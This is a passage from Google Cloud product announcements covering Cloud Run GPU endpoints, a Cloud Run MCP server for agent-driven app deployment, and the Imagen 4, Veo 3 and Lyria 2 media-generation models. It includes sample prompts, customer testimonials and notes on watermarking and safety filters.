This provides an endpoint running on Cloud Run’s simple, pay-per-second, scale-to-zero infrastructure with GPU instances starting in less than five seconds, and it scales to zero when not in use. It’s even compatible with the Google Gen AI SDK out-of-the-box, simply update two parameters in your code to use the newly deployed endpoint:

3. Empower AI agents to deploy apps with the new Cloud Run MCP server

The Model Context Protocol (MCP) is an open protocol standardizing how AI agents interact with their environment. At Google I/O, we shared that supporting open standards for how agents will interact with tools is a top priority for us.

Today, we are introducing the Cloud Run MCP server to enable MCP-compatible AI agents to deploy apps to Cloud Run. Let’s see it in action with a variety of MCP clients: AI assistant apps, AI-powered Integrated Development Environments (IDEs), and agent SDKs.

1. AI assistant apps

2. AI-powered IDEs

3. Agent SDKs, like the Google Gen AI SDK or Agent Development Kit also have support for calling tools via MCP, and can therefore deploy to Cloud Run using the Cloud Run MCP server. 

Add the Cloud Run MCP server to your favorite MCP client:

Get started

Build, deploy, and scale AI apps faster with AI Studio’s integration with Cloud Run and the new Cloud Run MCP server. Give it a try:

• Build in AI Studio and deploy to Cloud Run 

• Install Cloud Run MCP server on your local machine

• Chat with Gemma 3 in AI Studio and deploy Gemma 3 to Cloud Run

Today, we are introducing the next wave of generative AI media models on Vertex AI: Imagen 4, Veo 3, and Lyria 2. 

We’ve already seen customers generate stunning, photorealistic images with Imagen 3, Google’s image generation model. Customers have taken these images and transformed them into high quality videos and assets with Veo 2. We’ve even seen customers take these remarkable videos and bring them to life with professional-grade audio using Lyria, Google’s advanced AI music generation model.

With a surge of momentum in the generative AI media space across marketing, media, and more, storytelling has never been easier.  Users are creating campaign assets quicker, and building breakthrough creative content. Let’s take a look into each model and the ways you can get started today. 

Imagen 4: Higher quality image generation

Today we’re introducing Imagen 4 text-to-image generation on Vertex AI in public preview. As Google’s highest quality image generation model, Imagen 4 delivers:

• Outstanding text rendering and prompt adherence 

• Higher overall image quality across all styles

• Multilingual prompt support to help creators globally

Prompt: Capture an intimate close-up bathed in warm, soft, late-afternoon sunlight filtering into a quintessential 1960s kitchen. The focal point is a charmingly designed vintage package of all-purpose flour, resting invitingly on a speckled Formica countertop. The packaging itself evokes pure nostalgia: perhaps thick, slightly textured paper in a warm cream tone, adorned with simple, bold typography (a friendly serif or script) in classic red and blue “ALL-PURPOSE FLOUR”, featuring a delightful illustration like a stylized sheaf of wheat or a cheerful baker character. In smaller bold print at the bottom of the package: “NET WT 5 LBS (80 OZ) 2.27kg”. Focus sharply on the package details – the slightly soft edges of the paper bag, the texture of the vintage printing, the inviting “All-Purpose Flour” text. Subtle hints of the 1960s kitchen frame the shot – the chrome edge of the counter gleaming softly, a blurred glimpse of a pastel yellow ceramic tile backsplash, or the corner of a vintage metal canister set just out of focus. The shallow depth of field keeps attention locked on the beautifully designed package, creating an aesthetic rich in warmth, authenticity, and nostalgic appeal.

Prompt: This four-panel comic strip uses a charming, deliberately pixelated art style reminiscent of classic 8-bit video games, featuring simple shapes and a limited, bright color palette dominated by greens, blues, browns, and the dinosaur’s iconic grey/black. The setting is a stylized pixel beach. Panel one shows the familiar Google Chrome T-Rex dinosaur, complete with its characteristic pixelated form, wearing tiny pixel sunglasses and lounging on a pixelated beach towel under a blocky yellow sun. Pixelated palm trees sway gently in the background against a blue pixel sky. A caption box with pixelated font reads, “Even error messages need a vacation.” Panel two is a close-up of the T-Rex attempting to build a pixel sandcastle. It awkwardly pats a mound of brown pixels with its tiny pixel arms, looking focused. Small pixelated shells dot the sand around it. Panel three depicts the T-Rex joyfully hopping over a series of pixelated cacti planted near the beach, mimicking its game obstacle avoidance. Small “Boing! Boing!” sound effect text appears in a blocky font above each jump. A pixelated crab watches from the side, waving its pixel claw. The final panel shows the T-Rex floating peacefully on its back in the blocky blue pixel water, sunglasses still on, with a contented expression. A small thought bubble above it contains pixelated “Zzz…” indicating relaxation.

Prompt: Filmed cinematically from the driver’s seat, offering a clear profile view of the young passenger on the front seat with striking red hair. Her gaze is fixed ahead, concentrated on navigating the dusty, lonely highway visible through her side window, which shows a blurred expanse of dry earth and perhaps distant, hazy mountains. Her arm rests on the window ledge or steering wheel. The shot includes part of the aged truck interior beside her – the door panel, maybe a glimpse of the worn seat fabric. The lighting could be late afternoon sun, casting long shadows and warm highlights across her face and the truck’s interior. This angle emphasizes her individual presence and contemplative state within the vast, empty landscape.

To get started with Imagen 4 in public preview on Vertex AI, you can use Media Studio or run the following code sample, which uses the Google Gen AI SDK for Python.

Veo 3: Higher-quality video generation with audio and speech

Veo 3 is our latest state-of-the art video generation model from Google DeepMind. With Veo 3, you can generate videos with:

• Improved quality when generating videos from text and image prompts 

• Speech, such as dialogue and voice-overs

• Audio, such as music and sound effects

Here’s what a few of our customers have to say about productivity and creative gains with Veo: 

Klarna, a leader in digital payments, is leveraging Veo and Imagen on Vertex AI to boost content creation efficiency. From b-roll to YouTube bumpers, the company is significantly reducing production timelines.

“At Klarna, we’re constantly exploring ways to push the boundaries of innovation in our marketing efforts, and Veo has been a game-changer in our creative workflows. With Veo and Imagen, we’ve transformed what used to be time-intensive production processes into quick, efficient tasks that allow us to scale content creation rapidly. Whether it’s producing engaging b-roll, crafting eye-catching YouTube bumpers, or developing dynamic social media animations, these tools have empowered our teams to be more agile and creative. The results speak for themselves, driving increased engagement and content performance. With Google Cloud, we’re laying the groundwork for the future of commerce and revolutionizing how we bring our brand to life.” – David Sandström, Chief Marketing Officer, Klarna

Jellyfish, a renowned digital marketing company within The Brandtech Group, has integrated Veo into their top performing AI marketing platform, Pencil, and teamed up with Japan Airlines to offer AI generated in-flight entertainment.

“The addition of Veo 2 in Pencil reinforces our commitment to empowering marketers with sophisticated AI, enabling them to produce campaigns that are not only smarter and faster but also bolder and more artistically inspired. Our pilots have shown incredible results, with an average 50% reduction in costs and time-to-market efficiencies. This step change in control and quality turns previously impossible ideas into real marketing content in minutes. Japan Airlines is leading the way in applying Gen AI to the travel industry, and we’re excited to see how other brands follow suit.” – David Jones, Founder & CEO, Brandtech

Kraft Heinz’s Tastemaker platform empowers their teams with access to Imagen and Veo, dramatically accelerating creative and campaign development processes. 

“With Veo and Imagen on Vertex AI as part of our Tastemaker platform, Kraft Heinz has unlocked unprecedented speed and efficiency in our creative workflows. What once took us eight weeks is now only taking eight hours, resulting in substantial cost savings.” – Justin Thomas, Head Digital Experience & Growth

Envato, a global leader for digital creative assets and templates, used Veo 2 to develop their newly launched video generation feature, VideoGen, to enable creative professionals to turn text or images into hyper realistic and cinematic video content. 

“We’ve tried many of the top video models, and Veo 2 has driven the most impressive results in terms of speed and quality across a diverse set of text and image inputs. Within the first few days of launch, tens of thousands of Envato subscribers were already accessing VideoGen, with nearly 60% of their generated videos being downloaded for use in creative projects. Since March, Envato has seen VideoGen usage surpass 100%+ month over month. It’s been a pleasure working with Google Cloud to bring Envato’s VideoGen feature to life with Veo.” said Aaron Rutley, Head of Product for AI at Envato.

See how it works: Veo 3 is capable of handling intricate prompt details, as demonstrated in the following examples.

Prompt: A medium shot, historical adventure setting: Warm lamplight illuminates a cartographer in a cluttered study, poring over an ancient, sprawling map spread across a large table. Cartographer: “According to this old sea chart, the lost island isn’t myth! We must prepare an expedition immediately!”

Prompt: A low-angle shot shows an open, light purple door leading from a room with light purple walls and a gray floor to a vibrant outdoor scene. Lush green grass and wildflowers spill from the doorway onto the indoor floor, creating a whimsical transition between spaces. Beyond the door, rolling green hills dotted with more wildflowers stretch towards a bright, clear sky. A single tree stands prominently in the foreground of the outdoor scene, its leaves adding depth to the view. The sunlight and natural elements contrast with the simplicity of the indoor space, inviting a sense of wonder and escape.

Veo 3 is in private preview on Vertex AI and will be available more broadly in the coming weeks. If you’re interested in early access, please fill out this form. 

Lyria 2: Greater creative control with music generation

At Google Cloud Next 2025, we announced Lyria in Vertex AI, Google’s text-to-music model. Today, we’re announcing Lyria 2 is generally available in Vertex AI. As Google’s latest music generation model, Lyria 2 features high-fidelity music across a range of styles. As your next creative collaborator, Lyria 2 provides:

• High-quality audio content from text prompts

• Greater creative control over instruments, BPM, and other characteristics

To start creating content with Lyria 2, check out Media Studio on Vertex AI. Once there, you can start generating music from text prompts or access the model API via Vertex AI. For inspiration, check out some of the music clips and prompts below.

Prompt: Upbeat, Rhythmic Peruvian Cumbia with a psychedelic edge, LA, Live performance at a Latin music Festival, incorporating electric guitars, bass, and often utilizing a prominent timbales percussion section, creating a powerful and danceable vibe. Vibrant and energetic.

Prompt: Sweeping Orchestral Film Score, Pristine Studio recording, London, 100-piece Orchestra, Majestic and profound. A blend of soaring melodies, dramatic harmonic shifts, and powerful percussive elements, with instruments such as french horns, strings, and timpani, and a thematic approach, featuring intricate orchestrations, dynamic range, and emotional depth, evoking a cinematic and awe-inspiring atmosphere.

See what some of our customers have to say about Lyria 2 so far: 

Captions is an AI-powered video creation tool that allows users to create studio-grade talking videos quickly and easily. They have integrated Lyria 2 into their Mirage Edit feature enabling customers to quickly generate complete videos with customized sound.  

“At Captions, our Mirage Edit feature already gives subscribers the power to go from prompt to fully-edited AI talking video — complete with images, B-roll clips, voiceovers, and transitions. Now, we’re adding a keystone element: adaptive music powered by Google’s Lyria 2. With a single prompt, Lyria composes a score that syncs to the script, pacing, and transitions at every emotional beat, so our customers can publish cinematic short-form videos without ever leaving Captions or shuffling through stock libraries.” said Dwight Churchill, Co-Founder and COO, Captions.ai

Dashverse, owner of digital content platforms such as Dashtoon and DashReels, is leveraging Google’s Lyria 2 on Vertex AI to provide the next generation of AI-native creators with advanced music generation capabilities. This integration allows users to craft dynamic and emotionally responsive soundtracks that seamlessly adapt to the narrative and pacing of their content on platforms like DashReels. 

“We’ve always believed in empowering everyday creators at Dashverse — whether they’re making comics with Dashtoon or short dramas on DashReels. Our move into dynamic, emotionally resonant storytelling with DashReels needed a music engine that was just as expressive and responsive. Lyria 2 on Vertex AI delivers exactly that. It gives our users studio-level control over music — adapting to emotion, scene, and pacing — without the overhead. It’s not just a soundtrack generator; it’s a storytelling amplifier. We’re incredibly excited about what this unlocks for the next generation of AI-native creators.” said Soumyadeep Mukherjee, CTO, Dashverse

Create securely and share responsibly 

The security and safety of any AI generated content is crucial. Therefore, these models are designed with built in safeguards, allowing you to concentrate on your creative work. Veo 3, Imagen 4, and Lyria 2 are all built with safety as a fundamental design principle in partnership with Google DeepMind.

Watermarking: By default, all creations generated with Veo, Imagen, and Lyria utilize SynthID, a technology that embeds an invisible watermark directly into the generated output. This watermark allows for the identification of AI generated media, ensuring transparency. 

Safety filters: Both input prompts and output content for all generative AI media models are accessed against a list of safety filters. By being able to configure how aggressively the content is filtered, you can ensure the assets meet your brand values. In visual output data, you also have control over person generation. 

Get started 

You can learn more about these new models by checking out the resources below: 

• Imagen documentation

• Veo documentation

• Lyria documentation